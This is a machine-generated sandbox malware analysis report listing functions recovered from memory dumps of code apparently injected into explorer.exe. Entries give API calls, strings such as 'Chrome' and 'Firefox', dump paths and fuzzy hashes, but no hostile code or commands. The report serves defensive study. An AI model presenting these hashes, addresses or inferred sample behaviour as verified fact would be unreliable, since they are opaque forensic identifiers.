                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: _FF_MSGBANNER.LIBCMT ref: 0B0BC2DC
                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: _NMSG_WRITE.LIBCMT ref: 0B0BC2E6
                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: HeapAlloc.KERNEL32 ref: 0B0BC301
                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: _callnewh.LIBCMT ref: 0B0BC31A
                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: _errno.LIBCMT ref: 0B0BC325
                                                                                                                                                                                                                          • Part of subcall function 0B0BC2AC: _errno.LIBCMT ref: 0B0BC330
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0B0BB957
                                                                                                                                                                                                                          • Part of subcall function 0B0BC374: RtlPcToFileHeader.NTDLL ref: 0B0BC403
                                                                                                                                                                                                                          • Part of subcall function 0B0BC374: RaiseException.KERNEL32 ref: 0B0BC442
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                                                        • String ID: bad allocation
                                                                                                                                                                                                                        • API String ID: 1214304046-2104205924
                                                                                                                                                                                                                        • Opcode ID: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction ID: 9ee5523e7f147c5aa13e4e70cedb4a9277be4fe115d7b409f6500d0d6ce8cd8d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6fe58ce4160ecfe34ee5ac47addb2c129dbc8a6ecfc0b9808572de91645628e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601B122705B4A96DE2CAB95F581BE9B364FB89BC4F480031DA8D07B64EF7DC195CB00
                                                                                                                                                                                                                        Function 0DFFE6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFEC81C: _getptd.LIBCMT ref: 0DFEC829
                                                                                                                                                                                                                          • Part of subcall function 0DFEC81C: _inconsistency.LIBCMT ref: 0DFEC837
                                                                                                                                                                                                                          • Part of subcall function 0DFEC81C: _getptd.LIBCMT ref: 0DFEC83C
                                                                                                                                                                                                                          • Part of subcall function 0DFEC81C: _inconsistency.LIBCMT ref: 0DFEC858
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DFFE717
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFFE71D
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFFE730
                                                                                                                                                                                                                          • Part of subcall function 0DFEC8AC: _getptd.LIBCMT ref: 0DFEC8B5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                        • Instruction ID: e3a35350e2c2b39e4b5c5eee177339d9820445914b9d6d73dc80617136e5ed65
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8F03C376457418ACB20AF39EC802BD3365EB85B9AF49D425EB994B724DE34C981CB41
                                                                                                                                                                                                                        Function 0DF1E6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DF0C81C: _getptd.LIBCMT ref: 0DF0C829
                                                                                                                                                                                                                          • Part of subcall function 0DF0C81C: _inconsistency.LIBCMT ref: 0DF0C837
                                                                                                                                                                                                                          • Part of subcall function 0DF0C81C: _getptd.LIBCMT ref: 0DF0C83C
                                                                                                                                                                                                                          • Part of subcall function 0DF0C81C: _inconsistency.LIBCMT ref: 0DF0C858
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0DF1E717
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF1E71D
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DF1E730
                                                                                                                                                                                                                          • Part of subcall function 0DF0C8AC: _getptd.LIBCMT ref: 0DF0C8B5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                        • Instruction ID: 970477ba51756647921b04dfea1a68077bdc3438a7e23411c60b7473a6682dfd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5282434bfe7a37df0756af749a4f35f7ad74893750e9376d6f15404bc0e24bc0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0F03C2A6416418ADB30AF39EC802BD37A5EB45B9AF49D625EF594B704DE30C881DB41
                                                                                                                                                                                                                        Function 0B0CE6CA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0BC81C: _getptd.LIBCMT ref: 0B0BC829
                                                                                                                                                                                                                          • Part of subcall function 0B0BC81C: _inconsistency.LIBCMT ref: 0B0BC837
                                                                                                                                                                                                                          • Part of subcall function 0B0BC81C: _getptd.LIBCMT ref: 0B0BC83C
                                                                                                                                                                                                                          • Part of subcall function 0B0BC81C: _inconsistency.LIBCMT ref: 0B0BC858
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0B0CE717
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0CE71D
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0B0CE730
                                                                                                                                                                                                                          • Part of subcall function 0B0BC8AC: _getptd.LIBCMT ref: 0B0BC8B5
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 2821275340-1018135373
                                                                                                                                                                                                                        • Opcode ID: 53c7e99812ad044b33180f8e2fd9dc7e725c094cf5fc87ebb348c38e51aeede4
                                                                                                                                                                                                                        • Instruction ID: d8d1fb559248a9ee9b53b86dfd43d33d81e60303f91ee4f5c8ffbd1241fd6941
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53c7e99812ad044b33180f8e2fd9dc7e725c094cf5fc87ebb348c38e51aeede4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3F0AF366007428DCF38AF31C8816EE33A5E744B9AF589525DE4D4B704DF30D482CB40
                                                                                                                                                                                                                        Function 0DFD40F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                        • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction ID: c9ab0e6ecadaf80d87e20e1abfea3583ecbb09ac804561c833581d109a3e0147
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0A751B1170293FF554B95F8943712361DF94362F086035D91B46394EE7CC5D9C710
                                                                                                                                                                                                                        Function 0DEF40F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                        • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction ID: 27f61beadc19d232b1a8b1bc324192b303297c3634633d29d0ede1e3213fb73b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9F08256711702C2FF548B95F8953722250DB943A5F086035DA1F46394EE3CC5D9C710
                                                                                                                                                                                                                        Function 0B0A40F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-3789238822
                                                                                                                                                                                                                        • Opcode ID: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction ID: 72469960c4c58bb2115d95c88356fe70619e815485406a9af5c3963a80e235ce
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33f774c738225bedf7a8837716c29bf61cecf7715eaf567a3fe157e4ac2bf7a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42F0A755B1170283FF984B95F8953663791DB94761F082024DD1E463A4EF7CC5D9C700
                                                                                                                                                                                                                        Function 0DFEA070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DFD8B60: HeapCreate.KERNEL32 ref: 0DFD8B7D
                                                                                                                                                                                                                          • Part of subcall function 0DFEB640: lstrcpyA.KERNEL32 ref: 0DFEB694
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFEA0A1
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFEA0AE
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction ID: ce945c50e001800860207e4a386f4ac33865ae4fd9f874015b32e12de1d4932a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE09934A12E8294EB08EB50FC943443368F759344F918AA1D58D6A370EFB886D9C760
                                                                                                                                                                                                                        Function 0DF0A070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0DEF8B60: HeapCreate.KERNEL32 ref: 0DEF8B7D
                                                                                                                                                                                                                          • Part of subcall function 0DF0B640: lstrcpyA.KERNEL32 ref: 0DF0B694
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DF0A0A1
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DF0A0AE
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction ID: d6a8d36df50d9709c615050854fd3c3b3f7bfac5da60993cf4a056e053d66e8a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06E07E65511F03D4EA40EB94FC943B43368B754394F928173950B423B0AF3C865A8364
                                                                                                                                                                                                                        Function 0B0BA070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 0B0A8B60: HeapCreate.KERNEL32 ref: 0B0A8B7D
                                                                                                                                                                                                                          • Part of subcall function 0B0BB640: lstrcpyA.KERNEL32 ref: 0B0BB694
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0B0BA0A1
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0B0BA0AE
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                        • String ID: Chrome$Firefox
                                                                                                                                                                                                                        • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                        • Opcode ID: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction ID: 2b6d3e49aaf8fcc3931772cca9f329f4fbe25e7255380c1a44525af6522d6309
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e330c54a4b2e622a98fea326c37f8ccccc502dcc47614346d719dd19b4cc3071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3E0993AA12F0199EA04EB90FC963963368B758304F908966C42D523B0FF7CC259C300
                                                                                                                                                                                                                        Function 0DFE5590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                        • Instruction ID: c39da1d7b2ff7a77fa66ae091f8d7ade6270ee4c7b98a3ad6b8af3eb135fd1e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4401672272679081DA548B16F9543296691AB4CFC4F089574EE9E57B18DE6CD4C18B40
                                                                                                                                                                                                                        Function 0DF05590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                        • Instruction ID: f6c477a8ad746d44692ca07f7101c2d3dfad97b517af69dd92e920cfcf73ea63
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 199ba1bb78e9dde66d3d41d2c2d49e4fa21561a49f6180790060c0aaaa446e85
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E01D62272A78182EE548B5BB94433AA791EB4CFC0F099075EE4F43B58EE2CD5418B00
                                                                                                                                                                                                                        Function 0B0B5590 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1128592954-0
                                                                                                                                                                                                                        • Opcode ID: 349cf744cf77672f3add2f0737221b0cd4b513aa9c04065f38322893ec6cefa6
                                                                                                                                                                                                                        • Instruction ID: 4695de7e93d6b76864b83c6da18524c7fe998ce0004302168ce7c571cd1aba64
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 349cf744cf77672f3add2f0737221b0cd4b513aa9c04065f38322893ec6cefa6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8801D62272678082DE988B56B95432EB3A1EB4CFC0F084470DE5E43B18EF2CC4418700
                                                                                                                                                                                                                        Function 0DFD4A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                        • Instruction ID: cc2e87b998e5bc16a612fdf507243637cd75e92b79a1d125ae84448254af9b32
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7561F423708A8086DBA2CB6DE85436A7B62F385B84F4EC625CF9E07791DB7DC481C710
                                                                                                                                                                                                                        Function 0DEF4A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$isxdigitstrtol
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1632192098-0
                                                                                                                                                                                                                        • Opcode ID: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                        • Instruction ID: b02b3b95bac42038823f8f86bc83d2faacb99db1bd88e37b5eb7cc59773776cc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bea5eaa5b200dfe750684da9569748b84219257e5afafb58d170ccab548d2693
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD61A323308A8486FB218F65E85437B6B66F385B98F5AB226CF9B077D1DE2DC141C711
                                                                                                                                                                                                                        Function 0B0A4A60 Relevance: 6.2, APIs: 4, Instructions: 195stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
